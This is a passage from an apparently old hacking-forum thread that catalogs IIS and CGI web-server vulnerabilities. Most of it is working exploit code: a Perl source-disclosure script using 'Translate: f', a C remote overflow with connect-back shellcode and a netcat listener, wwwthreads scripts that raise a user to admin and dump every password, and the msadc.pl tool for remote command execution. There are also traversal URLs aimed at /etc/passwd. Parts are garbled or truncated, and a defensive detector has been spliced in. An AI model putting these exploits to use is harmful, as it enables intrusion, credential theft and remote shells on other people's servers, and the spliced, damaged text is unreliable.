local disk, database files and ASP source code! There are two ways to do it. First, if a file with the .htw extension exists on
your web server, file contents can be viewed in the following way, for example the contents of odbc.ini:

http://www.xxx.com/iissamples/is ... eCiHiliteType=Full

On a typical IIS install, .htw files can be found at:
/iissamples/issamples/oop/qfullhit.htw
/iissamples/issamples/oop/qsumrhit.htw
/iissamples/exair/search/qfullhit.htw
/iissamples/exair/search/qsumrhit.htw
/iishelp/iis/misc/iirturnh.htw


Second, if no such file exists on your web server, a vulnerable system still lets the user invoke
webhits.dll, as follows:

http://www.xxx.com/default.htm%2 ... itsFile=/../../winnt/odbc.iniCiRestriction=noneCiHiliteType=Full
The condition is that default.htm must exist. It can be some other file, but it must exist.
webhits.dll opens this file as a temporary file. When the number of %20 space characters in the URL
reaches a certain count, the web service's recognition can break, and webhits.dll then opens the specified
file \winnt\odbc.ini. If that succeeds, the same method opens more files, including ASP code. The
approximate principle is shown in this piece of code:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

FILE *fd;
int DoesTemplateExist(char *pathtohtwfile)
{
    // Just in case inetinfo.exe passes too long a string
    // let's make sure it's of a suitable length and not
    // going to open a buffer overrun vulnerability
    char *file;
    file = (char *)malloc(250);
    // the existence check runs on a copy cut at 250 bytes (and left without
    // a terminator when the input is longer), so a name padded with %20s can
    // pass as an existing file while the rest of the request is ignored here
    strncpy(file, pathtohtwfile, 250);
    fd = fopen(file, "r");
    free(file);
    // Success
    if (fd != NULL)
    {
        return 1;
    }
    // failed
    else
    {
        return 0;
    }
}


36. Translate: f
WebDAV in Win2000 and Office 2000 (including FrontPage 2000 and the FrontPage 2000 Server Ext
ensions) has a security problem, Translate: f. When someone sends the target an HTTP GET request for an ASP/ASA (or other script)
file that carries a "Translate: f" header, Windows 2000 without SP1 (not many have patched yet, I suppose) returns the
source code of the ASP/ASA instead of the processed file it should return (a special character "/" also has to be appended to the end of the URL).

smiler published an exploit for this hole written in Perl:

-----------------------------start------------------------------------------------
#!/usr/bin/perl
# Expl0it By smiler@vxd.org
# Tested with success against IIS 5.0. Maybe it works against IIS 4.0 using
# a shared drive but I haven't tested it yet.
# Get the source code of any script from the server using this exploit.
# This code was written after Daniel Docekal brought this issue in BugTraq.
# Cheers 351 and FractalG

if (not $ARGV[0]) {
print qq~
Geee it's running !! kewl ))
Usage : srcgrab.pl
Example Usage : srcgrab.pl http://www.victimsite.com/global.asa
U can also save the retrieved file using : srcgrab.pl
http://www.victim.com/default.asp > file_to_save
~; exit;}


$victimurl=$ARGV[0];

# Create a user agent object
use LWP::UserAgent;
$ua = new LWP::UserAgent;

# Create a request
my $req = new HTTP::Request GET => $victimurl . '\\'; # Here is the backslash at the end of the url
$req->content_type('application/x-www-form-urlencoded');
$req->content_type('text/html');
$req->header(Translate => 'f'); # Here is the famous translate header )
$req->content('match=www&errors=0');

# Pass request to the user agent and get a response back
my $res = $ua->request($req);

# Check the outcome of the response
if ($res->is_success) {
print $res->content;
} else {
print $res->error_as_HTML;
}
---------------------------------end---------------------------------------

To use this program you may need to download a few Perl modules (search for them at http://www.perl.org):
1. libwww-perl-5.48.tar.gz
2. URI-1.09.tar.gz
3. HTML-Parser-3.11.tar.gz
Each package is only a few tens of KB. After downloading and unpacking, cd into the directory and run
#perl Makefile.PL&&make&&make install
and that's it. Have fun.
(For some asp files you may need to append ? or / to the URL before the source shows.)


37. ftp.pl
http://www.server.com/cgi-bin/ft ... /../../../../../etc
This exposes every file under the etc directory. By the same token you can browse the contents of other directories, breaking out of the ftp directory restriction.


38. CGI-World Poll
Any remote user can specify it through a GET request, leading to unauthorized file access:
http://www.victim.com/cgi-bin/po ... _dir=/etc/passwd%00

39. Big Brother
Big Brother 1.4H and earlier have a security problem: because one script fails to check the input variable $HOSTSVC properly,
a remote user can specify a path and view the contents of arbitrary system files.

http://www.victim.com/cgi-bin/bb ... ../../../etc/passwd


40. Nortel Contivity package CGI

An intruder or malicious user could view any file on the system with a URL like the following:
http://x.x.x.x/manage/cgi/cgiproc?Nocfile=/name/and/path/of/file.
(Files an intruder may be interested in: /system/filelist.dat, /system/version.dat, /system/keys,
/system/core, etc.)

41. wais.pl + waisq CGI
wais.pl + waisq is a WAIS interface CGI that runs on NCSA servers. It has a hole that lets an
attacker obtain, through a remote overflow, a shell with the same privileges as the web server.
/*
OnWaisKlote.c - NCSA wais.pl + waisq remote overflow - by Scrippie

The shellcode makes a connection to the given IP and spawns a shell on port
27002. It's recommended to have a listening netcat ready on this port.
Ie. do a "nc -l -p 27002" on your machine, and run the exploit on the target
If everything works out, it'll connect and spawn a shell.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define FORBIDDEN "\x00\x09\x0b\x0c\r\n{};<>\\^()*[]$`&#~|\""
#define SZ_SOURCEBUF 256
#define SZ_FILEBUF 256
#define RETADDY 0xbffff910 /* Works on my cute `lil box */

int wwwconnect(unsigned long ip);
int ICinInt(long, char *, size_t);
char *buildOverflow(unsigned long, unsigned int);
void *xmalloc(size_t);

/*
Shellcode written by: Scrippie

Smegma v0.5 ridded this shellcode of the following characters:
"\x00\x09\x0b\x0c\r\n{};<>\\^()*[]$`&#~|\""

For this purpose a xor mask of 0x92011e11 was brute forced
*/

char hellcode[] =
"\xeb\x14\x58\x89\xc6\x31\xc9\xb1\x25\x81\x36\x11\x1e\x01\x92\x83\xc6\x04\xe2"
"\xf5\xeb\x05\xe8\xe7\xff\xff\xff\xfa\x64\x5f\xa3\xd1\x2f\xda\xa3\xc3\xae\x67"
"\x21\x10\x93\x4f\x8e\xa3\x1f\x88\xc4\x31\xac\x07\x1b\x47\x3a\xb3\x90\x98\x48"
"\x1d\x5f\x91\x97\x47\x8a\x98\x08\x67\x55\x57\x1c\x68\xe8\x98\x58\x1d\x1f\x17"
"\x97\x47\xb2\x91\xdc\x0f\x1b\x47\x3a\x30\x52\x15\x78\x81\x51\x13\x93\x4f\x8e"
"\xdc\x9e\x30\x52\x15\x21\x88\x50\x9a\x40\x19\xa3\xd8\xd3\x81\x1b\xc1\x5f\xcc"
"\x12\x98\xce\x40\x5f\x91\x2f\xc1\x1f\x6f\x11\x81\x53\x16\xed\xab\x96\x1a\x93"
"\x5f\x9a\x98\x40\x11\x1f\x5f\x0e\x30\x40\xdc\x9e\x30\x52\xef\xde\xcc\x12\xf9"
"\x9f\xfe\x6d\xee\x5f\x40\xd0\x53\xAA\xAA\xAA\xAA\x31\x63\xfb\x7f\x31\x72\xfa";

/* The IP address to connect to is gonna be at 0xAAAAAAAA */
/* Make sure it's encoded just as the shellcode is */

int main(int argc, char **argv)
{
char *iploc, *evilcode;
int sd, align=0;
unsigned long sip; /* IP to connect back to */
unsigned long dip; /* Target IP */
unsigned long retaddy=RETADDY; /* Default return address */

/* Whee, print the banner */

if(argc < 3) {
printf("OnWais Klote - Scrippie/Synnergy Networks\n");
printf("Use as: %s <target ip> <connect-back ip> [ret addy] [align]\n",
argv[0]);
exit(0);
}

printf("******************************************************\n");
printf("+ OnWais Klote - Scrippie/Synnergy.net +\n");
printf("******************************************************\n");

/* I know inet_addr() is obsolete - too bad, you can't run this
program when you're on 255.255.255.255 - who is anyway? */

if((dip = inet_addr(argv[1])) == -1) {
printf("Error: Non valid IP address specified\n");
exit(-1);
}

if((sip = inet_addr(argv[2])) == -1) {
printf("Error: Non valid IP address specified\n");
exit(-1);
}

/* Use specified return address */
if(argc > 3) {
retaddy = strtoul(argv[3], NULL, 16);
}
printf("Return address : 0x%lx\n", retaddy);

/* Use specified alignment */
if(argc > 4) {
align = atoi(argv[4]);
}
printf("Alignment : %d\n", align);
printf("Target : %s\n\n", argv[1]);

/* We convert our IP to fit in the payload */
/* Think of this as a strange value? Think of the shellcode alignment */
sip ^= 0x1192011e;

/* Check if the given RETADDY won't ruin our payload */
if(ICinInt(retaddy, FORBIDDEN, sizeof(FORBIDDEN)-1)) {
printf("Error: Found illegal character in return address\n");
exit(0);
}
/* Check if the given IP won't ruin our shellcode */
if(ICinInt(sip, FORBIDDEN, sizeof(FORBIDDEN)-1)) {
printf("Error: Found illegal character in IP address\n");
exit(0);
}

/* Locate the IP position in the shellcode */
iploc=(char *)strchr(hellcode, 0xAA);
memcpy((void *) iploc, (void *) &sip, 4);

evilcode = buildOverflow(retaddy, align);

sd = wwwconnect(dip);
printf("Connected to %s\n", argv[1]);
printf("Proceeding to send evil code...\n");
send(sd, evilcode, strlen(evilcode), 0);
printf("Sent!\n");

return(0);
}

char *buildOverflow(unsigned long retaddy, unsigned int align)
{
char source[SZ_SOURCEBUF];
char *smash, *output;
int c;

smash = (char *)xmalloc(SZ_FILEBUF+align+1);
output = (char *)xmalloc(SZ_SOURCEBUF+SZ_FILEBUF+align+1);

/* Fill the "source" argument with NOPs (the loop bound was lost in the
forum copy and is restored here from the comment below) */
for(c=0;c<SZ_SOURCEBUF;c++) source[c] = 0x90;

source[253] = 0xeb; /* Jump over few bytes between arrays on stack */
source[254] = 0x08;
source[255] = 0x00;

/*
Directory and Sourcename follow each other on stack closely
There are a few arbitrary bytes between them, therefore we
jump over them with 0xeb 0x08 and land somewhere in the given NOPS
*/

memset(smash, 0x90, 7+align);
/* Few nops on the stack - waisq ruins some bytes */
smash[7+align] = 0xeb; /* Jump over the EIP that we overflow */
smash[8+align] = 0x04; /* It's 4 bytes big */

/* Return address gets choked in here */

memcpy(smash+9+align, &retaddy, 4);
smash[13+align] = 0x00; /* strcat() needs the delimiter */

strcat(smash, hellcode); /* Copy the shellcode */

sprintf(output, "GET /cgi-bin/wais.pl?-s+%s+-t+%s HTTP/1.0\n\n",
source, smash); /* Stuff it all on the heap */

free(smash);
return(output); /* And return the pointer there */
}

/*
Connects to a webserver
"ip" is expected to be in network byte order
*/

int wwwconnect(unsigned long ip)
{
struct sockaddr_in sa; /* Sockaddr */
int sd; /* Socket Descriptor */

if((sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}

memset(&sa, 0x00, sizeof(struct sockaddr_in));
sa.sin_family=AF_INET; /* missing in the posted code; connect() fails without it */
sa.sin_port=htons(80);
sa.sin_addr.s_addr=ip;

if(connect(sd, (struct sockaddr *)&sa, sizeof(struct sockaddr_in)) == -1) {
perror("connect()");
exit(-1);
}

return(sd);
}
/*
This function checks for illegal bytes in "long" types
*/

int ICinInt(long s, char *forbidden, size_t fsize)
{
size_t i;
int j;

/* nested loop bounds restored; they were lost in the forum copy */
for(i=0;i<fsize;i++) {
for(j=0;j<4;j++) {
if((char)(s >> j*8) == forbidden[i]) return(1);
}
}
return(0);
}

/*
Wrapper for malloc() that does error checking
*/

void *xmalloc(size_t size)
{
void *blah;

if((blah = malloc(size)) == NULL) {
perror("malloc()");
exit(-1);
}
return(blah);
}

------------------------- END -----------------------------------------------------
OP | Posted on 2003-6-5 22:52:01
42. wwwthreads
wwwthreads is a widely used forum program, common on a number of foreign security forums. It has a vulnerability:
its SQL information retrieval engine lets a remote user obtain usernames and passwords, and lets an intruder use the SQL INSERT command
to gain access to the database. Tested successfully on the forum of one of the world's best-known hacker sites.

Exploit:
-[ wwwthreads.pl

#!/usr/bin/perl
# wwwthreads hack by rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";

$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh";

#####################################################

$parms="Cat=&Username=$username&Oldpass=$passhash".
"&sort_order=5,U_Status%3d'Administrator',U_Security%3d100".
"&display=threaded&view=collapsed&PostsPer=10".
"&Post_Format=top&review=on&TextCols=60&TextRows=5&FontSize=0".
"&FontFace=&PictureView=on&PicturePost=off";

$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n";

print sendraw($tosend);

sub sendraw {
     my ($pstr)=@_; my $target;
     $target= inet_aton($ip) || die("inet_aton problems");
     socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
           die("Socket problems\n");
     if(connect(S,pack "SnA4x8",2,80,$target)){
           select(S);         $|=1;
           print $pstr;        my @in=<S>;
           select(STDOUT);      close(S);
           return @in;
     } else { die("Can't connect...\n"); }}


-[ w3tpass.pl

#!/usr/bin/perl
# download all wwwthread usernames/passwords once you're administrator
# send a fake cookie with authentication and fake the referer
# initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1
#
# by rain forest puppy / rfp@wiretrip.net
use Socket;

#####################################################
# modify these

# can be DNS or IP address
$ip="209.143.242.119";

$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$zxcvzxvczxcvzxvczxcv";

#####################################################

@letts=split(//,'0ABCDEFGHIJKLMNOPQRSTUVWXYZ');
print STDERR "wwwthreads password snatcher by rain forest puppy\r\n";
print STDERR "Getting initial user lists...";

foreach $let (@letts){
$parms="Cat=&Start=$let";
$tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
"Cookie: Username=$username; Password=$passhash\r\n\r\n";

my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/showoneuser\.pl\?User=([^"]+)\"\>/){
  push @users, $1;}}}

$usercount=@users;
print STDERR "$usercount users retrieved.\r\n".
"Fetching individual passwords...\r\n";

foreach $user (@users){
$parms="User=$user";
$tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0\r\n".
"Referer: http://$ip/cgi-bin/wwwthreads/\r\n".
"Cookie: Username=$username; Password=$passhash\r\n\r\n";

my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/OldPass value = "([^"]+)"/){
  ($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  $user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
  print $user.':'.$pass."::::::::::\n";
  last;}}}

print STDERR "done.\r\n\r\n";

sub sendraw {
     my ($pstr)=@_; my $target;
     $target= inet_aton($ip) || die("inet_aton problems");
     socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
           die("Socket problems\n");
     if(connect(S,pack "SnA4x8",2,80,$target)){
           select(S);         $|=1;
           print $pstr;        my @in=<S>;
           select(STDOUT);      close(S);
           return @in;
     } else { die("Can't connect...\n"); }}
OP | Posted on 2003-6-5 22:53:07
43. msadcs.dll
The default installation of IIS 4.0 sets up MDAC 1.5, which places the file /msadc/msadcs.dll under the web root and also allows
ODBC to be reached remotely over the web, giving control of the system. If /msadc/msadcs.dll/ under the web directory is reachable,
then none of Microsoft's patches may help: a request like
/%6Dsadc/%6Dsadcs.dll/V%62BusO%62j.V%62BusO%62jCls.GetRecordset
bypasses the security mechanism and issues an illegitimate VbBusObj request, achieving the intrusion.
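From the defender's side, both the wwwthreads sort_order trick in section 42 and the percent-encoded msadcs.dll request just described are easy to spot once request paths are normalized. The following detector is an added example, not code from the original post or from either exploit's author; it decodes paths (including double encoding), flags escapes that hide plain letters, checks for the RDS paths the msadc.pl script touches, and tests changedisplay.pl's sort_order parameter for anything other than a column number. The sample request lines are constructed.

```python
"""Added detector: RDS/msadcs.dll probes and the wwwthreads sort_order injection."""
import re
from urllib.parse import parse_qs, unquote

# Constructed sample request lines (not from any real log): "METHOD target".
SAMPLE_REQUESTS = [
    "GET /index.html",
    "GET /msadc/msadcs.dll",
    "GET /%6Dsadc/%6Dsadcs.dll/V%62BusO%62j.V%62BusO%62jCls.GetRecordset",
    "GET /%256Dsadc/msadcs.dll",  # double-encoded variant
    "GET /scripts/tools/newdsn.exe?driver=Microsoft%2BAccess&dsn=wicca&dbq=c%3A%5Csys.mdb&newdb=CREATE_DB",
    "GET /cgi-bin/wwwthreads/changedisplay.pl?Cat=&Username=bob&sort_order=5&display=threaded",
    "GET /cgi-bin/wwwthreads/changedisplay.pl?Cat=&Username=rfp"
    "&sort_order=5,U_Status%3d'Administrator',U_Security%3d100&display=threaded",
]

# Paths the msadc.pl script touches: the RDS DataFactory and the DSN creator.
RDS_PATHS = ("/msadc/msadcs.dll", "/scripts/tools/newdsn.exe")

def normalize(s, rounds=3):
    """Percent-decode until stable (bounded) and lowercase, so that
    %6D, %256D and M all compare equal to 'm'."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s.lower()

def encoded_alnum(path):
    """True if any %XX escape in the raw path decodes to a plain letter or digit,
    which no legitimate client needs to encode (the %6D / %62 trick)."""
    return any(chr(int(h, 16)).isalnum() for h in re.findall(r"%([0-9a-fA-F]{2})", path))

def classify(request):
    """Return the list of finding tags for one 'METHOD target' request line."""
    _method, _, target = request.partition(" ")
    path, _, query = target.partition("?")
    npath = normalize(path)
    findings = []
    if any(npath.startswith(p) for p in RDS_PATHS):
        findings.append("rds-probe")
    if "vbbusobj" in npath:
        findings.append("rds-vbbusobj")
    if encoded_alnum(path):
        findings.append("obfuscated-encoding")
    if "%25" in path.lower():
        findings.append("double-encoding")
    if npath.endswith("/wwwthreads/changedisplay.pl"):
        sort_order = normalize(parse_qs(query, keep_blank_values=True).get("sort_order", [""])[0])
        # A benign sort_order is a bare column number; commas, quotes or '='
        # in it are the U_Status/U_Security assignment injection.
        if sort_order and not sort_order.isdigit():
            findings.append("wwwthreads-sort_order-injection")
    return findings

def scan(requests):
    """Map each flagged request to its findings; benign requests are dropped."""
    return {r: classify(r) for r in requests if classify(r)}
```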
Attack program:
# Save the following as a text file, then run: "perl -x filename"

#!perl
#
# MSADC/RDS 'usage' (aka exploit) script
#
#     by rain.forest.puppy
#
# Many thanks to Weld, Mudge, and Dildog from l0pht for helping me
# beta test and find errors!

use Socket; use Getopt::Std;
getopts("e:vd:h:XR", \%args);

print "-- RDS exploit by rain forest puppy / ADM / Wiretrip --\n";

if (!defined $args{h} && !defined $args{R}) {
print qq~
Usage: msadc.pl -h  { -d  -X -v }
     -h       = host you want to scan (ip or domain)
     -d      = delay between calls, default 1 second
     -X           = dump Index Server path table, if available
     -v           = verbose
     -e           = external dictionary file for step 5

     Or a -R will resume a command session

~; exit;}

$ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
if(!defined $args{R}){ $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems; host doesn't exist?");}
if (defined $args{X} && !defined $args{R}) { &hork_idx; exit; }

if (!defined $args{R}){ $ret = &has_msadc;
die("Looks like msadcs.dll doesn't exist\n")if $ret==0}

print "Please type the NT commandline you want to run (cmd /c assumed):\n"
     . "cmd /c ";
$in=<STDIN>; chomp $in;
$command="cmd /c " . $in ;

if (defined $args{R}) {&load; exit;}

print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
&try_btcustmr;

print "\nStep 2: Trying to make our own DSN...";
&make_dsn ? print "<<success>>\n" : print "<<failed>>\n";

print "\nStep 3: Trying known DSNs...";
&known_dsn;

print "\nStep 4: Trying known .mdbs...";
&known_mdb;

if (defined $args{e}){
print "\nStep 5: Trying dictionary of DSN names...";
&dsn_dict; } else { print "\nNo -e; Step 5 skipped.\n\n"; }

print "Sorry Charley...maybe next time?\n";
exit;

##############################################################################

sub sendraw {      # ripped and modded from whisker
     sleep($delay); # it's a DoS on the server! At least on mine...
     my ($pstr)=@_;
     socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
           die("Socket problems\n");
     if(connect(S,pack "SnA4x8",2,80,$target)){
           select(S);           $|=1;
           print $pstr;           my @in=<S>;
           select(STDOUT);           close(S);
           return @in;
     } else { die("Can't connect...\n"); }}

##############################################################################

sub make_header { # make the HTTP request
my $msadc=<< length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
return $out;}

##############################################################################

sub rdo_success { # checks for RDO return success (this is kludge)
my (@in) = @_; my $base=content_start(@in);
if($in[$base]=~/multipart\/mixed/){
return 1 if( $in[$base+10]=~/^\x09\x00/ );}
return 0;}

##############################################################################

sub make_dsn { # this makes a DSN for us
my @drives=("c","d","e","f");
print "\nMaking DSN: ";
foreach $drive (@drives) {
print "$drive: ";
my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
     "Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
     . $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
$results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
return 0 if $2 eq "404"; # not found/doesn't exist
if($2 eq "200") {
foreach $line (@results) {
return 1 if $line=~/(H2)Datasource creation successful<\/H2>/;}}
} return 0;}

##############################################################################

sub verify_exists {
my ($page)=@_;
my @results=sendraw("GET $page HTTP/1.0\n\n");
return $results[0];}

##############################################################################

sub try_btcustmr {
my @drives=("c","d","e","f");
my @dirs=("winnt","winnt35","winnt351","win","windows");

foreach $dir (@dirs) {
print "$dir -> "; # fun status so you can see progress
foreach $drive (@drives) {
print "$drive: "; # ditto
$reqlen=length( make_req(1,$drive,$dir) ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;

my @results=sendraw(make_header() . make_req(1,$drive,$dir));
if (rdo_success(@results)){print "Success!\n";save(1,1,$drive,$dir);exit;}
else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}

##############################################################################

sub odbc_error {
my (@in)=@_; my $base;
my $base = content_start(@in);
if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
$in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
$in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
return $in[$base+4].$in[$base+5].$in[$base+6];}
print "\nNON-STANDARD error. Please sent this info to rfp\@wiretrip.net:\n";
print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
     $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}

##############################################################################

sub verbose {
my ($in)=@_;
return if !$verbose;
print STDOUT "\n$in\n";}

##############################################################################

sub save {
my ($p1, $p2, $p3, $p4)=@_;
open(OUT, ">rds.save") || print "Problem saving parameters...\n";
print OUT "$ip\n$p1\n$p2\n$p3\n$p4\n";
close OUT;}

##############################################################################

sub load {
my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)}; dbq=";
open(IN,"<rds.save") || die("Couldn't open rds.save\n"); @p=<IN>; close(IN);
$ip="$p[0]"; $ip=~s/\n//g; $ip.="." if ($ip=~/[a-z]$/);
$target= inet_aton($ip) || die("inet_aton problems");
print "Resuming to $ip ...";
$p[3]="$p[3]"; $p[3]=~s/\n//g; $p[4]="$p[4]"; $p[4]=~s/\n//g;
if($p[1]==1) {
$reqlen=length( make_req(1,"$p[3]","$p[4]") ) - 28;
$reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(1,"$p[3]","$p[4]"));
if (rdo_success(@results)){print "Success!\n";}
else { print "failed\n"; verbose(odbc_error(@results));}}
elsif ($p[1]==3){
     if(run_query("$p[3]")){
     print "Success!\n";} else { print "failed\n"; }}
elsif ($p[1]==4){
     if(run_query($drvst . "$p[3]")){
     print "Success!\n"; } else { print "failed\n"; }}
exit;}

##############################################################################

sub create_table {
my ($in)=@_;
$reqlen=length( make_req(2,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(2,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 1 if $temp=~/Table 'AZZ' already exists/;
return 0;}

##############################################################################

sub known_dsn {
# we want 'wicca' first, because if step 2 made the DSN, it's ready to go
my @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
     "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
     "banner", "banners", "ads", "ADCDemo", "ADCTest");

foreach $dSn (@dsns) {
     print ".";
     next if (!is_access("DSN=$dSn"));
     if(create_table("DSN=$dSn")){
     print "$dSn successful\n";
     if(run_query("DSN=$dSn")){
     print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; } else {
print "Something's borked. Use verbose next time\n";}}} print "\n";}

##############################################################################

sub is_access {
my ($in)=@_;
$reqlen=length( make_req(5,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(5,$in,""));
my $temp= odbc_error(@results);
verbose($temp); return 1 if ($temp=~/Microsoft Access/);
return 0;}

##############################################################################

sub run_query {
my ($in)=@_;
$reqlen=length( make_req(3,$in,"") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw(make_header() . make_req(3,$in,""));
return 1 if rdo_success(@results);
my $temp= odbc_error(@results); verbose($temp);
return 0;}

##############################################################################

sub known_mdb {
my @drives=("c","d","e","f","g");
my @dirs=("winnt","winnt35","winnt351","win","windows");
my $dir, $drive, $mdb;
my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq=";

# this is sparse, because I don't know of many
my @sysmdbs=(     "\\catroot\\icatalog.mdb",
           "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
           "\\system32\\certmdb.mdb",
           "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%

my @mdbs=(     "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
           "\\cfusion\\cfapps\\forums\\forums_.mdb",
           "\\cfusion\\cfapps\\forums\\data\\forums.mdb",
           "\\cfusion\\cfapps\\security\\realm_.mdb",
           "\\cfusion\\cfapps\\security\\data\\realm.mdb",
           "\\cfusion\\database\\cfexamples.mdb",
           "\\cfusion\\database\\cfsnippets.mdb",
           "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
           "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
           "\\cfusion\\brighttiger\\database\\cleam.mdb",
           "\\cfusion\\database\\smpolicy.mdb",
           "\\cfusion\\database\cypress.mdb",
     "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
           "\\website\\cgi-win\\dbsample.mdb",
     "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
     "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
           ); #these are just
foreach $drive (@drives) {
foreach $dir (@dirs){
foreach $mdb (@sysmdbs) {
print ".";
if(create_table($drv . $drive . ":\\" . $dir . $mdb)){
print "\n" . $drive . ":\\" . $dir . $mdb . " successful\n";
if(run_query($drv . $drive . ":\\" . $dir . $mdb)){
print "Success!\n"; save (4,4,$drive . ":\\" . $dir . $mdb,""); exit;
} else { print "Something's borked. Use verbose next time\n"; }}}}}

foreach $drive (@drives) {
foreach $mdb (@mdbs) {
print ".";
if(create_table($drv . $drive . $dir . $mdb)){
print "\n" . $drive . $dir . $mdb . " successful\n";
if(run_query($drv . $drive . $dir . $mdb)){
print "Success!\n"; save (4,4,$drive . $dir . $mdb,""); exit;
} else { print "Something's borked. Use verbose next time\n"; }}}}
}

##############################################################################

sub hork_idx {
print "\nAttempting to dump Index Server tables...\n";
print " NOTE: Sometimes this takes a while, other times it stalls\n\n";
$reqlen=length( make_req(4,"","") ) - 28;
$reqlenlen=length( "$reqlen" );
$clen= 206 + $reqlenlen + $reqlen;
my @results=sendraw2(make_header() . make_req(4,"",""));
if (rdo_success(@results)){
my $max=@results; my $c; my %d;
for($c=19; $c<$max; $c++){
     $results[$c]=~s/\x00//g;
     $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
     $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
     $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
     $d{"$1$2"}="";}
foreach $c (keys %d){ print "$c\n"; }
} else {print "Index server doesn't seem to be installed.\n"; }}

##############################################################################

sub dsn_dict {
open(IN, "<$args{e}") || die("Can't open external dictionary\n");
while(<IN>){
     $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
     next if (!is_access("DSN=$dSn"));
     if(create_table("DSN=$dSn")){
     print "$dSn successful\n";
     if(run_query("DSN=$dSn")){
     print "Success!\n"; save (3,3,"DSN=$dSn",""); exit; } else {
print "Something's borked. Use verbose next time\n";}}}
print "\n"; close(IN);}

##############################################################################

sub sendraw2 {      # ripped and modded from whisker
     sleep($delay); # it's a DoS on the server! At least on mine...
     my ($pstr)=@_;
     socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
           die("Socket problems\n");
     if(connect(S,pack "SnA4x8",2,80,$target)){
           print "Connected. Getting data";
           open(OUT,">raw.out"); my @in;
           select(S);     $|=1;      print $pstr;           
           while(<S>){ print OUT $_; push @in, $_; print STDOUT ".";}
           close(OUT); select(STDOUT); close(S); return @in;
     } else { die("Can't connect...\n"); }}

##############################################################################

sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) {
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually

##############################################################################

sub funky {
my (@in)=@_; my $error=odbc_error(@in);
